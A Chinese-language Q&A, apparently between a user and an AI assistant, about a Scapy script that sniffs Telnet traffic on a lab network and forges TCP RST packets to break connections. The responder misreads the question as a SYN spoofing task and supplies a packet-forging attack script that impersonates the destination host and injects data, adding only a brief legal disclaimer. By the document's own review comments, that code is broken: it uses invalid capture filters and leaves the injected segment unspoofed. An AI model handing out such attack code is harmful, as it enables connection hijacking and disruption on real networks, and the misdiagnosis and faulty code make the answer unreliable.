#!/usr/bin/python3 from scapy.all import* SRC = "172.17.0.2" DST = "172.17.0.3" PORT = 23 def spoof(pkt): old_tcp = pkt[TCP] old_ip = pkt[IP] if(old_tcp.flags=="R"): return ########################################################################### ip = IP(src = old_ip.dst, dst = old_ip.src) tcp = TCP(sport = old_tcp.dport, dport = old_tcp.sport, seq = old_tcp.seq,flags = "R") ########################################################################### pkt = ip/tcp send(pkt, verbose=0) print("Spoofed Packet: {} --> {}".format(ip.src, ip.dst)) f = 'tcp and src host {} and dst host {} and dst port {}'.format(SRC, DST, PORT) sniff(filter=f, prn=spoof) 帮忙看一下这个代码的问题
这段代码的问题在于,它会跳过捕获到的 RST 包,并对其余每个匹配的包回送一个伪造的 TCP RST 包,而没有实现 TCP SYN 包的欺骗。
因此,如果您的目标是使用 Scapy 实现 TCP SYN 欺骗攻击,您需要修改代码以实现以下操作:
1. 捕获发送到目标 IP 地址和端口的 TCP SYN 包。
2. 构造一个 TCP SYN/ACK 响应包并发送到源 IP 地址和端口。
3. 等待目标设备发送一个 ACK 包作为响应。
4. 在收到 ACK 包后,您可以选择继续发送数据包,或者关闭连接。
您可以参考以下代码示例来实现 TCP SYN 欺骗攻击:
```
#!/usr/bin/python3
from scapy.all import*
# Endpoints of the observed connection: SRC and DST are the source and
# destination hosts named in the capture filter, PORT is the destination
# TCP port (23, the Telnet port).
SRC, DST, PORT = "172.17.0.2", "172.17.0.3", 23
def spoof(pkt):
    """Sniff callback: reply to a captured TCP SYN with a forged SYN/ACK.

    The reply carries DST as its source address and PORT as its source
    port. The function then waits for one follow-up packet and sends either
    a data segment or a RST, printing each step.

    NOTE(review): the listing lost its indentation on the page; the nesting
    below is the reviewer's reading of the intended structure.
    NOTE(review): nothing here stops the host that really owns DST from
    answering the same SYN, so the peer may see two conflicting replies.
    Confirm against the lab setup.
    """
    old_tcp = pkt[TCP]
    old_ip = pkt[IP]
    # Act only on packets whose flag field is exactly SYN.
    if old_tcp.flags == "S":
        print("Received TCP SYN packet from {}".format(old_ip.src))
        # Build the SYN/ACK reply: fixed initial sequence number 12345,
        # acknowledging the captured sequence number plus one.
        ip = IP(src = DST, dst = old_ip.src)
        tcp = TCP(sport = PORT, dport = old_tcp.sport, seq = 12345, ack = old_tcp.seq + 1, flags = "SA")
        pkt = ip/tcp
        # Send the SYN/ACK reply.
        send(pkt, verbose = 0)
        print("Sent TCP SYN/ACK packet to {}".format(old_ip.src))
        # Wait for the peer's ACK.
        # NOTE(review): `tcp.flags==0x10` is Wireshark display-filter syntax,
        # while Scapy's `filter` argument takes a BPF expression, so this
        # filter string is expected to be rejected as written.
        f = 'tcp and src host {} and dst host {} and dst port {} and tcp.flags==0x10'.format(old_ip.src, DST, PORT)
        # No timeout is passed, so this nested capture blocks inside the
        # callback until one packet matches.
        ack_pkt = sniff(filter = f, count = 1)
        # Send data or close the connection.
        if ack_pkt:
            print("Received ACK packet from {}".format(old_ip.src))
            # Send a data segment. No src, seq or ack is set here, so Scapy's
            # defaults apply and the packet does not reuse the DST source
            # address or the sequence numbers used in the SYN/ACK above.
            data_pkt = IP(dst = old_ip.src)/TCP(sport = PORT, dport = old_tcp.sport, flags = "PA")/"Hello, world!"
            send(data_pkt, verbose = 0)
            print("Sent data packet to {}".format(old_ip.src))
        else:
            # Close the connection. With count = 1 and no timeout, this branch
            # runs only if the nested capture returns without a packet.
            print("Failed to receive ACK packet from {}".format(old_ip.src))
            rst_pkt = IP(dst = old_ip.src)/TCP(sport = PORT, dport = old_tcp.sport, flags = "R")
            send(rst_pkt, verbose = 0)
            print("Sent RST packet to {}".format(old_ip.src))
# Capture TCP SYN packets sent from SRC to DST on PORT and pass each to spoof.
# NOTE(review): `tcp.flags==0x02` is Wireshark display-filter syntax, while
# Scapy's `filter` argument takes a BPF expression, so this filter string is
# expected to be rejected as written.
f = 'tcp and src host {} and dst host {} and dst port {} and tcp.flags==0x02'.format(SRC, DST, PORT)
# No count or timeout is given, so the capture runs until it is interrupted.
sniff(filter = f, prn = spoof)
```
请注意,TCP SYN 欺骗攻击可能违反法律法规,因此请务必遵守当地法律法规并仅用于合法目的。